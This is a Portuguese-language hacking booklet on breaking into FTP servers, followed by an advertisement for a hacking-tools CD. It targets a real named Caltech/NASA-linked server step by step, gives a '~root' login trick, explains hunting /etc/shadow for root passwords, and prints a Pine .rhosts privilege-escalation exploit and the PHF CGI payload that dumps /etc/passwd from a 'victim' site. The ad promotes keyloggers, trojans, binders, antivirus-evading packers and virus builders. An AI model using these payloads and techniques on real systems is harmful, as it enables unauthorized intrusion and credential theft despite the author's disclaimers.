Escolar Documentos
Profissional Documentos
Cultura Documentos
O que FTP
Conceitos bsicos
Cliente/Servidor
Porta padro
Como conectar
Comandos
TraDuo de nome de arquivos
Mensagens FTP
Servidor alvo
Sobre o servidor que envia dados para NASA
FTP UNIX
Usurios
Navegao
Principais comandos UNIX
Modificando os permisses
Principais diretrios
Senhas e Exploits
Login annimo
Logar como root
Diretrio das senhas
Decriptografando uma senha
Quebrando uma senha
Exploits UNIX
BuG DE PHF
Principais Falhas de FTP
PREFCIO
Atualmente invadir um servidor de FTP no mais uma tarefa facio.
Os sistemas operacionais, protocolos evoluram, muitos bugs foram
corrigidos. Mas ainda esta longe de ser perfeito, existem muitas falhas,
formas de invaso. O que no existe mais so as formulas prontas do tipo
use este script que voc esta dentro do servidor
Para voc conseguir entrar em um servidor FTP, antes de tudo voc
precisa saber como ele funciona, quais as vulnerabilidades do servidor e
de seu sistema operacional, conhecer a fundo o protocolo FTP, seus
comandos, ou seja, preciso realmente estudar.
O propsito desta apostila este, estudar o funcionamento e
vulnerabilidades de um servidor FTP. Eu usei um servidor Americano que
envia dados para NASA como exemplo, deixei tudo passo a passo como
logar e navegar no servidor, porem quero deixar claro que no tem nada
de ilegal, o servidor tem suas protees como veremos mais adiante. No
estou promovendo nenhum tipo de crime virtual, usem isto para aumentar
seu conhecimento em segurana, lembrando que se voc mudar um byte
de um servidor que voc no tem autorizao crime.
Rackerox
rackerox@hotmail.com
O QUE FTP
FTP significa File Transfer Protocol (Protocolo de Transferncia de Arquivos), e uma forma
bastante rpida e verstil de transferir arquivos, sendo uma das mais usadas na internet.
Um Website precisa de um servidor FTP para guardar seus arquivos. Quando voc visita um site
na internet, voc esta baixando os arquivos do site (paginas html, fotos, sons, etc) para o seu
computador.
Se voc tiver acesso ao servidor FTP de um site, voc ter acesso aos arquivos deste site, e mais
se voc estiver logado o FTP voc poder mudar os arquivos
Primeiramente vamos entender alguns conceitos.
Para existir uma comunicao entre computadores necessrio:
-Um endereo de cada computador (IP)
-Um linguagem que os dois computadores entendam ( protocolos)
-Como so vrios servios ao mesmo tempo,exemplo chat ,site ,remote, etc...Cada servio precisa ter uma
porta especifica, caso contrario os dados de um servio iriam ser recebidos por outros.
Cliente / Servidor
Sem complicar...o conceito simples:
Cliente o seu programa de ftp que esta no seu computador.
Servidor o que est hospedado junto com o site.
(voc tambm pode criar um servidor em seu computador)
O Servidor remoto aceita uma conexo de controle do cliente local. O cliente envia comandos para o servidor
e a conexo persiste ao longo de toda a sesso (tratando-se assim de um protocolo que usa o TCP).O servidor
cria uma conexo de dados para a transferncia de dados, sendo criada uma conexo para cada arquivo
transferido. Estes dados so transferidos do servidor para o cliente e vice e versa.
Os comandos esto separados dos dados e o cliente pode enviar comandos durante a transferncia de dados. O
encerramento da conexo indica o fim do arquivo.
Porta padro
A porta padro para FTP a porta 21
Como conectar
Existem vrios Programas de cliente FTP, mas eles apenas servem para manuteno de sites. O melhor
programa mesmo so os clientes que no usam interface grfica, eles funcionam com linha de comando,
funcionam no MS-DOS ou no Prompt de Comando no windows.
Vamos fazer um conexo com um servidor FTP usando o programa de FTP que existe no windows XP.Este
programa no tem interface grfica, ele roda no Prompt de comando.
Para abrir o prompt de comando v em executar e digite cmd.
Agora vamos abrir o programa de FTP no prompt de comando. Basta digitar ftp e apertar enter. Agora voc
esta com o programa aberto, preciso aprender os comandos.
Comandos FTP
Estes comandos funcionam com voc logado no servidor.Voc ter controle total sobre os arquivos
hospedados.
COMANDO
SINTAXE
DESCRIO
! COMANDO
ascii
bell
binary
bye
bye
cd
cd DIRETRIO
ascii
bell
binary
cdup
chmod
close
close
delete
delete ARQUIVO
Apaga ARQUIVO
cdup
dir
get
help
help COMANDO
lcd
lcd DIRETRIO
ls DIRETRIO ARQUIVO-LOCAL
mdelete ARQUIVOS
Apaga ARQUIVOS
mdir
mget
mget ARQUIVOS
mkdir DIRETRIO
mls
mode
mode MODO
modtime ARQUIVO
mput ARQUIVOS
newer
newer ARQUIVO-REMOTO
ARQUIVO-LOCAL
nlist
Semelhante a nls
put
pwd
pwd
quit
quit
Semelhante a bye
recv
recv ARQUIVO-REMOTO
Semelhante a get
ls
mdelete
mkdir
modtime
mput
ARQUIVO-LOCAL
reget
remotehelp
rhelp
reget ARQUIVO-REMOTO
ARQUIVO-LOCAL
remotehelp COMANDO
rhelp COMANDO
rename
Renomeia um arquivo
rmdir
rmdir DIRETRIO
Apaga DIRETRIO
send
size
size ARQUIVO
status
status
system
system
type
type TIPO
? COMANDO
Semelhante a help
Mensagens FTP
O FTP permite dois modos de transferncia de mensagens FTP: texto (com tradues apropriadas) ou binrio
(sem traduo). Cada mensagem do servidor inclui um identificador decimal de 3 dgitos (exemplo: 226
Transfer complete). Estas mensagens podem ser vistas ou no, usando para isso o modo verbose ou quiet,
respectivamente.
SERVIDOR ALVO
Antes de tudo quero deixar claro que isto no uma invaso ilegal, o servidor possui suas
protees, mas adiante vocs vo perceber.
Vamos ver passo a passo como chegar at os arquivos de dentro do servidor.
Site alvo: http://ned.ipac.caltech.edu/
Clique em ping it
Pronto agora temos o IP do servidor:
Clique em START
Observe:
Eu no sei se este o LOG deles, mas pode ter certeza que o servidor tem um.
Quando voc entra com o Webexploiter voc conecta via Proxy.
O seu IP passa a ser: 67.15.221.2
Olhe da onde este IP:
City: Houston
State: TX
Country: US
Postal code: 77060
Area code: 281
Voc vai verificar que existe conexo e que agora as coisas ficam um pouco mais srias, olhe a mensagem:
Agora digite:
quote user ftp
Observe, ele aceita este usurio e pede o Password
Agora digite:
quote pass ftp
Olha que bunito xD, voc esta dentro do servidor da NASA.
Agora digite
lcd Desktop
lcd rox
Listando Diretorios
Primeiro vamos usar o comando dir
Apesar de ser um servidor UNIX o dir vai funcionar porque um comando de seu programa de FTP
do windows.
O servidor no aceitou, isto significa que o nvel do seu usurio no permite UPAR nada para
aquele diretrio. Tente em outro diretrio, mas acredito que com logim annimo voc no vai
conseguir. S com outro login.
Vamos traduzir:
*-----------------------------------------------------------------------* Este computador financiado pelo Governo dos Estados Unidos
* E operado pelo California Institute of Technology
* De apoio ao curso U.S. Government programas e atividades.
* Ao continuar, voc concorda com os dados que voce digitar
* Sendo monitorado. Os usurios deste sistema no tm nenhuma expectativa de
* Privacidade.
* Se voc no est autorizado a acessar a este sistema, desconecte agora.
*------------------------------------------------------------------------
Analisando os arquivos
Eu analisei os arquivos do servidor e no achei nada de interessante.
S tem dados de satlite, telescpio estudos de fsica.
Se fosse na guerra fria at dava para vender para Unio Sovitica rsrs.
Mas da para estudar e estrutura de diretrios e arquivos UNIX
Olhem as extenses que mais aparecem.
.dat dat uma abreviao de data (dados), este arquivo contem dados, neste caso dados de
telescpio, satlite,sei la.
Eu renomei um deles para .txt , tinha isto:
File Name: .dat, Processing Time: Thu Feb 8 04:30:00
Output option: compact_2
************************** SEARCH REQUESTS ******************************
IN_CSYS : equatorial , IN_EQUINOX : J2000.0
OUT_CSYS: equatorial , OUT_EQUINOX: J2000.0
EXTENDED_NAME_SEARCH: Yes
SORTED_BY_FIELD : Distance_to_search_center
REDSHIFT_VELOCITY : 10000.0
DEFAULT_RADIUS
: 1.000000
DEFAULT_BEGIN_YEAR : 1900
DEFAULT_END_YEAR : 2006
IAU NAME STYLE
:S
NEARPOSN:
1.4514872000d ; 54.55719600 ; 1.00
Much care has gone into the collection of POSITIONS and VELOCITIES in
NED, and they are carried along with uncertainties and references to
their origin. These are continually over-written by more accurate
values as they become available.
The other "Basic Data", however -- diameters, magnitudes, flux densities,
cluster populations, etc -- are indicative values only, in the sense that
they originate in many different sources, and have not been placed on a
uniform scale. The main sources are catalogs and compilations, with the
more accurate data sets favored, and the larger ones favored at comparable
accuracy. No information is kept about the origin of "Basic Data".
More controlled and rigorous data collection is applied to PHOTOMETRIC
DATA, POSITION DATA, and REDSHIFT DATA. These measurements are carried
along with their uncertainties, references to their origin, and some
information about the data collection and processing behind them. Unlike
basic data, PHOTOMETRIC, POSITION, and REDSHIFT DATA are never erased or
updated, but should serve as a cumulative record of the measurements on
each object. As a future enhancement to NED, additional data frames
along the same lines will be introduced for kinematics, classifications,
and other parameters.
A. Galaxies (G)
Field 1:
Field 2:
Field 3:
Field 4:
Morphology
A magnitude in the visible range, on any scale as available
Major axis diameter in arcmin
Minor axis diameter in arcmin
Restries
Quando logamos apareceu a mensagem:
(restries aplicadas)
E quando digitamos dir apareceu isto.
d x w so cdigos de permisso para cada diretrio, mas adiante eu explicarei o que significa cada
cdigo.
Isto significa que no temos acesso a tudo dentro do servidor, agora voc percebeu que entrar
annimo, no significa burlar uma senha, mas sim entrar como um usurio com um nvel baixo e
cheio de restries. Mas, uma vs l dentro, voc pode procurar por arquivos e dados que te levam
a senha do root ou outros usurios.
Neste formato, todas as linhas, com exceo da ltima, possuem um hfen (ASCII 45 - 0x2D)
imediatamente aps o cdigo de retorno, exceto a ltima, que no possui hfen justamente para
sinalizar que a ltima linha da resposta.
Ento enquanto no aparecer o hfen deve-se aguardar o termino da resposta
LOGANDO no SISTEMA
Os comandos so simples user (para usurio) e (pass para senha)
Depois de conectado com o programa de ftp do windows ou do linux vamos enviar comandos
diretamente para o servidor utilizando o comando quote
quote user seuusuario
quote pass suasenha
Se voc no souber nenhuma senha tente annimo
quote user anonymous
quote pass rackerox@ned.ipac....
Voc tambm pode tentar explorar uma falha antiga, mas s funciona com servidores
antigos.quando aparecer para logar digite isto:
quote user ftp
depois
quote cwd ~root ou quote cwd~sys quote cwd~sysop
depois
quote pass ftp
O comando cwd (Change Working Directory) usado orinalmente para abrir um diretrio, neste
caso ele iria abrir ~root ,se isto acontecer Voce estar com privilgios root, voc pode fazer o que
quiser no servidor, ter permisso para tudo, inclusive para ser preso =)
SISTEMA OPERACIONAL
Agora que j estamos logados vamos descobrir qual o sistema operacional do servidor, vamos usar
o comando syst , como um comando direto vamos usar quote syst
Agora sabemos que UNIX
CONEXO DE DADOS
Existem comandos que precisam de uma conexo de dados estabelecida, por exemplo, se for
baixar algum arquivo do servidor necessrio estabelecer portas do computador para isto.
O programa de FTP faz tudo isto automaticamente, mas como estando enviando um comando
direto ao servidor teremos que estabelecer quais sero as portas que iremos usar.
Vamos usar o comando port
O port indica ao servidor quais portas sero usadas na conexo
Neste comando, deve-se passar 6 valores separados pro vrgula. Os 4 primeiros so os dgitos do IP.
Os outros dois valores representam a porta TCP em que ser feita a conexo.para definir a porta um pouquinho
complicado, voc ter que separar os dois bytes que compem o valor da porta e convert-los para decimal.Exemplo:
Xxxxx
Exemplo do comando port
Voc tambm pode deixar o servidor especificar qual porta ser utilizada, eu acho bem melhor, ai
voc no corre o risco de especificar uma porta que j esta sendo utilizada.Para isto use o
comando pasv
Os bytes retornados nos parnteses so: os quatros primeiros so o IP, os outros dois so a porta.
Para obter o nmero da porta, pegue o primeiro valor, multiplique por 256 e some ao segundo.
Neste caso (164,217) a porta seria 24201 (10x164 + 217 = 24201).
HELP
Cuidado para no se confundir com o help, este comando lista todos os comandos do servidor,
mas se voc digita apenas help voc ter os comandos do seu programa de FTP, para ver os
comandos do servidor digite quote help
user anonymous
pass rackerox@ipac.caltech.edu
Depois s voce apertar enter que voc estar logado, observe a imagem.
Via telnet voc ter uma conexo direta com o servidor, isto significa que voc no precisa mais do
quote, e tambm que aqueles comandos do programa de FTP no funcionar aqui.
Aqui s vo funcionar os comandos do servidor.
Para encerrar a conexo, basta digitar quit
Clique em Iniciar > Configuraes > Painel de Controle > Conexes de Rede.
Em outros locais (coluna esquerda) entre em Meus Locais de Rede
Depois clique em Adicionar local de Rede
Agora s ir seguindo as etapas.
Coloque o IP ou o endereo do servidor de FTP
A vantagem de usar FTP desta forma que fica bem mais simples e intuitivo.
Mas a grande Desvantagem que voc no ter as varias opes de comandos que existe no
prompt, voc est limitado a copiar colar. Por exemplo, se tiver algum arquivo oculto, voc nem
saber.
FTP UNIX
A grande maioria dos servidores de FTP usam o Sistema Operacional UNIX.
Vamos ver como funciona e os principais comandos de UNIX em um servidor FTP
USURIOS
Root = super usurio ( poder realizar todas as funes sem restrio )
Cada usurio classificado com um nmero, de 0 a FFFF-1 (65534).
O numero 0 designado para o Root e o 65534 para Ananymous
De 0 a 100 so de superusurios (bin, adm, user, admin, guest, etc), se o servidor for pequeno o
root e estes outros superusrios so a mesma pessoa.
NAVEGAO
Importante em Unix os comandos so Case Sensitive ( diferencia letras maisculas e minsculas
ao contrario do MS-DOS)
O Unix usa arvore de diretrios igual ao DOS mas a barra invertida, ( utilize / ao invs de \ )
ls (mostras os diretrios e arquivos, o ls equivale ao DIR /W)
ls a (mostras arquivos ocultos)
ls la (mostras arquivos ocultos com detalhes)
ls l (mostra as permisses)
exemplo:
drw-r--r--
root
root
10000
1 de abril
etc
d - directory
r - read - so pode ver, dar download, etc...
w - write - pode editar, gravar...
x - execute - eh um executavel ou um script (tipo .BAT do DOS)
PRINCIPAIS COMANDOS
cd nomedodiretorio (para mudar de diretrio)
cd .. (para voltar um diretrio)
pwd (para ver em que diretrio voc esta)
mkdir nomedodiretorio (para criar um diretrio)
rm arquivo (remover um arquivo, ir pedir confirmao y ou n )
cp arquivooriginal novalocalizaao (copiar um arquivo)
cat (mostra o contedo de um arquivo equivale ao type do DOS)
who ( mostra quem est conectado no server, para mandar uma mensagem utilize write
nomedouser)
get nomedoarquivo (faz download do arquivo)
cc arquivo (compila um arquivo)
gcc arquivo monedoprograma ( compila um arquivo como o cc)
MODIFICANDO AS PERMISSES
chmod muda as permisses, exemplo:
ls -l teste.txt
-rw-r--r-- LoKi LoKi 34 teste.txt
chmod g+w teste.txt ---> muda o acesso do Group para +write
ls -l teste.txt
-rw-rw-r-- LoKi LoKi 34 teste.txt
chmod a-r teste.txt ---> muda o acesso de All para -read
ls -l teste.txt
--w--w---- LoKi LoKi 34 teste.txt
chmod u+w teste.txt ---> muda o acesso de User para +write
ls -l teste.txt
--w--w--w- LoKi LoKi 34 teste.txt
resumindo:
o - para Owner
g - para o Grupo
u - para todos Usurios
Importante: somente o root ou o proprietrio pode usar o chmod.
Mais comandos
chown, muda o OWNER (proprietrio) de algum arquivo, isso se voc for o OWNER atual.
Use chown novodono nomedoarquivo
chgrp, muda o grupo a que pertence o arquivo.
Use chgrp novogrupo nomedoarquivo
PRICIPAIS DIRETORIOS
/etc/passwd
Neste diretrio esto contidos:
Usurios, Senhas , Ids
Abra o arquivo passwd, dependendo da sua permisso aparecera:
root:*:0:1:system PRIVILEGED account:/:/bin/sh
anonymous:*Nologin:65534:65534:anonymous NFS user:/:
ou
zezinhodaesquina:HS$672H:457:457:Senhor Joao:/usr/joazinho:/bin/sh
Observe que no lugar das senhas dos usurios aparece um asterisco * , isto significa que as
senhas esto em um outro lugar. Normalmente em
/etc/shadow, e as vezes ela esta -r (No read) para os Users normais.
Agora hora de trabalhar, se as senhas esto (no read) teremos que achar uma forma de v-las.
O senha do root aparece com um asterisco por causa do shadow mas o shadow esta r para
voc. Normalmente /etc/shadow est escondido como /etc/.shadow
Diretrios que comeam com ponto . So diretrios ocultos.
Se o .shadow no estiver na diretrio etc, voc precisa procurar e o arquivo passwd pode estar
com outro nome.
/etc/shadow
podem conter senhas como vimos anteriormente
/etc/group
Aqui fica guardado quem pertence a cada grupo e as senhas do grupo.
/usr/adm/loginlog
Aqui ficam os Logs, horrios de entradas e sadas dos usurios.
As vazes podem estar em /usr/adm/acct/loginlog
E as vezes nem encontrado, alguns servidores desativam este servio.
/usr/mail/<nomedousuario> :
Aqui fica o MAIL do usurio, para voc ler esse arquivo voc tem de
ser o root ou o prprio usurio.
/upload ou /cache
Aqui ficam gravados arquivos temporrios que os usurios ou mesmo o
ROOT ia utilizar dentro do server, mas eles sao apagados a cada 24 horas ou
a cada semana. Em muitos servers nao existe esse diretrio.
/bin :
Neste diretrio ficam os comandos do server e as shells. Cuidado.
SENHAS E EXPLOITS
Login annimo
user: anonymous
pass: eu@dominio
Logar como root (somente em servidores com falha)
quote user ftp
quote cwd ~root
quote pass ftp
quote user ftp
quote cwd ~sys
quote pass ftp
quote user ftp
quote cwd ~sysop
quote pass ftp
Exploits UNIX
Exploiter sem duvida a melhor forma de hackear um servidor, mas muito mais complicado,
impossvel voc entender um exploiter se voc no souber programar.
Um exploit um programa que voc cria e faz ele rodar dentro do servidor exploranda falhas e te
levando root.
Eu achei um timo exemplo de exploit que roda via telnet, o PINE EXPLOIT
Vendo o processo da tabela com ps voc pode ver os usurio rodando o pine. Um ento pode
fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usurio. Vendo o processo da tabela
de novo vai revelar quais usuarios ou saem com mensagens no lidas nos seus inbox.
Efetivamente deletando o lockfile respectivo. Criando um link de /tmp/.hamors_lockfile para
~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as
identidades processadas e que elas contm. Agora precisa fazer um " echo "+ +" >
/tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19::05
.302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine
BUG de PHF
Este exploit muito antigo, muito dificio achar um servidor desatualizado.
Basta colocar o exploit no seu navegador.Exploit:
/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
ele mostrar o diretrio das senhas, voc coloca o exploit na frende da URL do site, exemplo:
http://www.sitevitima.com /cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Como vocs pedem notar isto o bsico. No parem de estudar, e principalmente compartilhar
informao.
Se quiserem entrar em contato comigo para tirar alguma dvida:
Email:
rackerox@webexploiter.com
MSN
rackerox@hotmail.com
Praga de Orkut:
http://www.orkut.com/Profile.aspx?uid=4380671928865807152
www.cdhackingtools.com
Conteudo do CD:
Redes/Internet
-Emita Pacotes UDP (com opo de tamanho de Buffer) para qualquer porta
-Programas para conexo remota ( com suporte para diferentes roteadores )
-Faa uma lista de todas as portas TCP e UDP abertas em seu computador.
-Capture pacotes de IP contendo protocolos http em sua rede
-Procure por pastas compartilhadas
-Desligue um computador de rede local ou atravs da Internet.
-Altere o seu endereo MAC
-Capture informaes de sua rede, conexes so estabelecidas, chats, etc. e monitore tudo distancia via email.
-Verifique o status de qualquer servidor na internet
-Faa do seu computador um servidor de internet.
-Capture todas as informaes do trfego de sua rede/conexo.
-Recupere de FTM, SMTP, POP3, http, mySQL, ICQ, Telnet e tambm senhas protegidas por asteriscos (til para senhas de
wireless).
-Deixe qualquer porta de seu computador em escuta e crie um log de texto.
-Faa DNS Spoofing ( redirecione qualquer endereo de site para o site que voc quiser)
-Mapeie qualquer porta de seu pc para outra maquina
-Monitore qualquer servidor http, smtp, pop3
-Envie emails diretamente para seu pc, faa um diagnostico qualquer servidor smtp
-Editor de cookies
-E muito mais... so vrios programas de snifers, scans, telnet, etc.
Exploiters/Scans
Um exploit, um programa com uma poro de dados ou uma sequncia de comandos que se aproveita das
vulnerabilidades de um sistema computacional como o prprio sistema operativo ou servios de interao de protocolos
(ex: servidores Web). So geralmente elaborados por hackers como programas de demonstrao das vulnerabilidades, a
fim de que as falhas sejam corrigidas, ou por crackers a fim de ganhar acesso no autorizado a sistemas.
Trojans Backdoors
Um meio secreto ou no documentado de invadir um sistema de computador .
Trojan backdoor um programa que age como a lenda do cavalo de tria. entrando no computador , e liberando uma
porta para um possvel invasor.
Os trojans atuais so divididos em duas partes: o servidor e o cliente Normalmente, o servidor est oculto em algum outro
arquivo e, no momento que esse arquivo executado, o servidor se instala e se oculta no computador da vtima; a partir
deste momento, o computador pode ser acessado pelo cliente, que ir enviar informaes para o servidor executar certas
operaes no computador da vtima.
Resumindo :
Servidor o vrus trojan que vai se instalar no pc da vtima
Cliente o programa que esta no seu pc
E vc precisa de um endereo para conectar o servidor ao cliente ,este endereo o IP
Keyloggers
Keylogger (que significa registrador do teclado em ingls) um programa de computador cuja finalidade monitorar tudo
o que digitado.Instalado no computador sem o conhecimento da vtima o keylogger captura dados sensveis e os envia a
um cracker.Neste CD existe Keyloggers que so programveis para enviar os logs para o email de uma pessoa.
Bruteforces
(Fora Bruta): tcnica de intruso de sistemas que se baseia em tentativa e erro. So geradas palavras e a combinao
destas com em nomes de usurios e senhas tentada exaustivamente at que um usurio vlido seja
encontrado.Ferramentas para fora bruta em:
- HTTP Basic Auth
- HTTP Form
- FTP
- POP3
- TELNET
- SMB (Netbios)
- Custom
IP Scans
Procure portas abertas e falhas de seguranas de um determinado IP ou uma faixa de IP especfica.
Obtenha resoluo de host names, checagem de portas abertas, varredura de mquinas mortas, varreduras de mltiplas
portas. Faa scans at de IP que no respondem ao ping.
Procure trojans instalados em uma determinada faixa de IP.
Nuckers
Nuke o nome atribudo a programas que finalizam
prematuramente com uma conexo TCP atravs do envio
de pacotes ICMP com mensagens de erro. Tais pacotes
podem ser direcionadas para o servidor (server side nuke)
ou para o cliente (client side nuke).
Tais programas tem a propriedade de terminar com a
conexo fazendo com que o cliente ou o servidor sejam
enganados por uma mensagem de erro que normalmente
indicaria um problema de conexo entre os dois.
Binders
Ferramenta que combina dois ou mais arquivos em um s, geralmente, com o fim de ocultar um deles. Um binder compila
a lista selecionada em um arquivo host, que poder ser renomeado. Arquivo host um programa simples compilado e
personalizado que ir descompactar e executar os programas de origem. A iniciar o host, os arquivos incorporados so
automaticamente descompactados e executados. Quando um cavalo de Tria est vinculado ao Notepad, por exemplo, a
sua aparncia e execuo iro se assemelhar ao Notepad, mas o cavalo de Tria tambm ser executado
Criptografia
Programas de codificao e Decodificao de dados.
Criptografia de arquivos em pastas, web ,dados,scripts etc.
Programaao
O CD contem varias ferramentas de programao.
Editores de HTML, PHP , Javascript, binary, hexadecimal.
Ambiente de Programao em C C++ SQL Ruby Java CSS HTML PHP PERL COBOL
Tradutor de Algoritmos. Programas para vc desenvolver o seu software.
Gerador de programa de instalao etc.
Compiladores
Compiladores so programas que permitem transformar cdigos escrito na linguagem de programao usada em
linguagem de mquina, gerando o binrio que pode ser executado.
No CD contem compiladores de C C++ Assesmbler Perl
Resource
Modifique, extraia e insira Resources em executveis, voc pode mudar totalmente um programa de 32 bits .Voc pode
mudar caixas de dilogo, cones e outras coisas.
Conversores
Corverta vrios formatos de arquivo.
De bat para exe, html para exe, pps para exe, vbs para exe, udio e vdeo para exe, swf para exe, decompilador de flash,
conversor de email para (PDF, HTML, RTF, TXT, DOC, MCW, WPS, SAM, RFT, WS4, WRI, etc.).
Compressores
Compressores so programas que executa partes do cdigo ao mesmo nivel de prioridade que o sistema operacional
permite supervisar e controlar as aplicaes executadas. Excelente para que voc esconda seus virus de modo que o
antivirus no detecte.
Compactadores
So programas que usam certas tcnicas para criar um arquivo, que contm vrios arquivos e/ou pastas compactados.No
cd contem os programas Winrar, Winzip e UPX
Ferramentas web
Ferramentas para voc usar em websites,programas de FTP ,download de sites , Gerenciador de download .etc .
Ferramentas windows
Ferramentas para alterar o seu windows , gerenciador de registro, remova windows pirata, temas, limpeza de disco,
manuteno do sistema, proteo de arquivos, etc.
Vrus
Um vrus de computador nada mais do que um programa que fica residente na memria do microcomputador , e de
acordo com determinados parmetros executa uma ao (normalmente danosa)o cd contem mais de 1000 virus, Virus
Builders, arquivos de batch.
Msn/orkut
So mais de 70 programas para msn .
Sniffers para capturar conversas de msn na sua rede
Coloque o vdeo que vc quiser na imagem da sua webcan.
Envie qualquer arquivo que o msn bloqueia.
Programas de flood.
Faa um log de todas as musicas que seu amigo ouviu.
"Roube" as imagens de exibio, emotions, etc. dos seus contatos.
Pegue o IP de seu amigo.
Envie uma mensagem automtica quando seu amigo fechar sua janela.
Traduza suas mensagens na janela de contato apertando a tecla F5, Transforme tudo o que voc digitar em link de
pesquisa
E muito mais.... ou seja um pacote de programas que vai muito alem do Discovery.
Mais clientes de msn alem do windows messenger.
Veja quem te excluiu, que esta aparecendo offline, fale com o nick do seu amigo etc (Discovery)
Programas para orkut e mirc.
Servidores
Servidor um sistema de computao que fornece servios a uma rede de computadores tanto rede local como internet.
O cd contem servidore de: Email, HTTP, FTP, DNS, PHP,
SSH e PERL.
Hospede seu site em seu prprio computador.
Clientes
Programas que acessam os servios de um servidor. Telnet, SSH
Segurana
Programas para ajudar na sua segurana, no um kit de anti vrus.
Controla as portas de entrada do computador, detecte websites fraudulentos, remova spywares, keyloggers, e adwares,
Monitore a segurana de seu computador distancia.
Crie um emulador de terminal Telnet e SSH.
Ferramentas gerais
Recupere senhas, Altere cones, resete senha do usurio, crie seus prprios auto executveis, monitor de webcan,
gerenciador de uploads
Mais
Navegadoes: Firefox,Netscape,Opera e Safari
Rode o Linux dentro do windows
Sistemas operacionais
Programas que rodam do pen drive
Cdigos fontes do:
Secure Internet Communication Sute.
Crack Whore 2.2 (Fonte do programa feito para testar a segurana dos sites.)
GnuPG , Java Telnet Applet, Pattern Finder, Ultimate (boot), Zodiac.
Orkut Community
Hall of Hackers
CD Room de Softwares
Scan On Line
Blog Hacking
www.cdhackingtools.com
www.webexploiter.com
http://insecuritynet.blogspot.com